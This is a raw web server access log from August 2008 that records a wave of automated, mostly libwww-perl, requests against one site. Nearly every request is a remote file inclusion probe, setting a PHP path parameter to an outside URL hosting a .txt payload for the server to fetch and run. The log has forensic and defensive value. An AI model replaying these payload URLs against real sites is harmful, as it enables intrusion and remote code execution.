74.55.183.82 - - [10/Aug/2008:09:58:14 -0700] "GET /logs/index.php?sayfa=http://rjoos.ch/Reise/images/tOtti/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:58:15 -0700] "GET /logs/access_080218.log//newspublish/include.php?path%5Bdocroot%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:58:16 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:59:22 -0700] "GET /logs/access_080226.log//newspublish/include.php?path%5Bdocroot%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:09:59:23 -0700] "GET /logs/access_080404.log//newspublish/include.php?path%5Bdocroot%5D=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:59:44 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:59:44 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:59:44 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:59:48 -0700] "GET /logs/access_080227.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:59:49 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:09:59:49 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.183.82 - - [10/Aug/2008:09:59:52 -0700] "GET /logs/access_080219.log/index.php?sayfa=http://www.naturopathic.org/images/bulletins/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.192.70.11 - - [10/Aug/2008:10:00:00 -0700] "GET /logs/ask_password.php?dir=http://geocities.com/penjahat_lase/scan/dosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
82.192.70.11 - - [10/Aug/2008:10:00:05 -0700] "GET /ask_password.php?dir=http://geocities.com/penjahat_lase/scan/dosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
151.1.210.219 - - [10/Aug/2008:10:00:18 -0700] "GET /logs/access_080224.log//?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:10:00:55 -0700] "GET /logs/access_080126.log/modules/xfsection/modify.php?dir_module=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:10:00:57 -0700] "GET /logs/access_080309.log//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:01:23 -0700] "GET /logs/access_080308.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:10:01:23 -0700] "GET /logs/access_080219.log//?path%5Bdocroot%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:01:25 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:01:26 -0700] "GET /logs/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:01:30 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:01:30 -0700] "GET /logs/access_080218.log//agendax/addevent.inc.php?agendax_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:01:31 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:10:01:38 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.245.226.25 - - [10/Aug/2008:10:01:38 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [10/Aug/2008:10:02:11 -0700] "GET /index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 200 18427 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:02:12 -0700] "GET /logs/access_080404.log/index.php?redir=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:03:00 -0700] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:03:01 -0700] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 200 18619 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
85.17.35.228 - - [10/Aug/2008:10:03:19 -0700] "GET /logs/access.log/index.php?sayfa=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.35.228 - - [10/Aug/2008:10:03:19 -0700] "GET /logs/index.php?sayfa=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.17.35.228 - - [10/Aug/2008:10:03:21 -0700] "GET /index.php?sayfa=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 200 18417 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:04:04 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:04:04 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:04:55 -0700] "GET //Neos_Chronos/header.php?base_folder=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:04:56 -0700] "GET /logs/access_080218.log//Neos_Chronos/header.php?base_folder=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:04:57 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:05:03 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:05:25 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.17.35.228 - - [10/Aug/2008:10:05:52 -0700] "GET /logs/access_080219.log/index.php?sayfa=http://www.freewebtown.com/elitewa/22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:06:40 -0700] "GET /errors.php?error=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
69.65.41.92 - - [10/Aug/2008:10:06:40 -0700] "GET /logs/errors.php?error=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:07:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:07:07 -0700] "GET /logs/phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:07:07 -0700] "GET /phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:07:07 -0700] "GET /phphtml.php?htmlclass_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:07:23 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:07:24 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:07:25 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
205.234.193.81 - - [10/Aug/2008:10:07:35 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [10/Aug/2008:10:07:35 -0700] "GET //skin/zero_vote/error.php?dir=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [10/Aug/2008:10:07:35 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [10/Aug/2008:10:07:42 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:08:40 -0700] "GET //inc/formmail.inc.php?script_root=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:08:41 -0700] "GET /logs//inc/formmail.inc.php?script_root=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
202.70.83.4 - - [10/Aug/2008:10:08:49 -0700] "GET /phphtml.php?htmlclass_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:08:55 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:08:56 -0700] "GET /logs/access.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:08:56 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:08:56 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:08:57 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:08:58 -0700] "GET /logs/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:10:09:20 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:09:26 -0700] "GET /logs/errors.php?error=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
67.205.67.205 - - [10/Aug/2008:10:09:26 -0700] "GET /errors.php?error=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:10:09:42 -0700] "GET /logs/access_080329.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:10:09:42 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:10:09:43 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:09:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:09:50 -0700] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:09:50 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:09:52 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.33.84.163 - - [10/Aug/2008:10:10:10 -0700] "GET /logs/access_080117.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [10/Aug/2008:10:10:10 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [10/Aug/2008:10:10:11 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:10:26 -0700] "GET /logs/access_080714.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.103.23.40 - - [10/Aug/2008:10:10:36 -0700] "GET /logs/access_080209.log/modules/4nAlbum/public/displayCategory.php?basepath=http://www.jamesyong.net/main/media/test/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [10/Aug/2008:10:10:56 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.33.84.163 - - [10/Aug/2008:10:10:57 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:11:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:11:27 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:11:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:11:27 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:11:50 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.51.141.74 - - [10/Aug/2008:10:11:50 -0700] "GET /logs/access_080324.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:10:14:10 -0700] "GET /logs/access_080117.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:10:14:10 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:10:14:11 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:14:55 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:14:56 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:14:56 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:14:56 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:15:02 -0700] "GET /logs//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:15:03 -0700] "GET //htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:15:50 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:15:50 -0700] "GET /logs/access_080218.log//inc/download_center_lite.inc.php?script_root=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:15:51 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:10:16:01 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.87.154.41 - - [10/Aug/2008:10:16:01 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:16:25 -0700] "GET //%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:16:26 -0700] "GET /logs/access_080218.log//%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:16:27 -0700] "GET /logs//%5Cecommerce%5Cpapyment%5Ccybersource.php?path[docroot]=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
132.229.91.22 - - [10/Aug/2008:10:16:34 -0700] "GET /logs/access_080404.log//inc/download_center_lite.inc.php?script_root=http://89.106.91.4/sex.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:16:34 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [10/Aug/2008:10:16:35 -0700] "GET /logs/access_080209.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://techchicktips.net/wiki/img/wiki/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:16:48 -0700] "GET /logs//htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:10:16:48 -0700] "GET //htmltonuke.php?http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.162.125 - - [10/Aug/2008:10:16:51 -0700] "GET /index.php?dir=http://www.freexhost.info/users/gardhenal/Id.txt??? HTTP/1.1" 200 18431 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [10/Aug/2008:10:17:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [10/Aug/2008:10:17:01 -0700] "GET //skin/zero_vote/error.php?dir=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
202.228.192.194 - - [10/Aug/2008:10:17:01 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://d35m0.homeunix.net/R7.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:17:17 -0700] "GET /logs/access_080127.log/bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.160.123.134 - - [10/Aug/2008:10:17:19 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:17:41 -0700] "GET /logs/access_080118.log/errors.php?error=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [10/Aug/2008:10:17:41 -0700] "GET /logs/errors.php?error=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
